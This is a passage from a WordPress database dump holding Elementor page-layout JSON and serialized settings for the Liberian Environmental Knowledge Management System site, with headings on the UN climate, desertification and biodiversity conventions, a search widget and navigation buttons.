Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(12416,2022,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:5:\"align\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:6:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;s:23:\"text_shadow_text_shadow\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:3;}}}}s:9:\"jet-posts\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:2:{s:15:\"section_general\";a:15:{s:6:\"number\";i:3;s:7:\"columns\";i:3;s:17:\"equal_height_cols\";i:3;s:9:\"post_type\";i:3;s:11:\"posts_query\";i:3;s:11:\"related_tax\";i:3;s:8:\"post_ids\";i:3;s:10:\"show_image\";i:3;s:12:\"show_excerpt\";i:3;s:11:\"show_author\";i:3;s:9:\"show_date\";i:3;s:13:\"show_comments\";i:3;s:9:\"show_more\";i:3;s:8:\"rows_gap\";i:3;s:13:\"title_trimmed\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:3;s:20:\"content_related_meta\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:3;s:27:\"title_typography_typography\";i:3;s:26:\"title_typography_font_size\";i:3;s:28:\"title_typography_font_weight\";i:3;}}}}}'),(12421,2023,'_wp_page_template','default'),(12422,2023,'_elementor_edit_mode','builder'),(12423,2023,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate 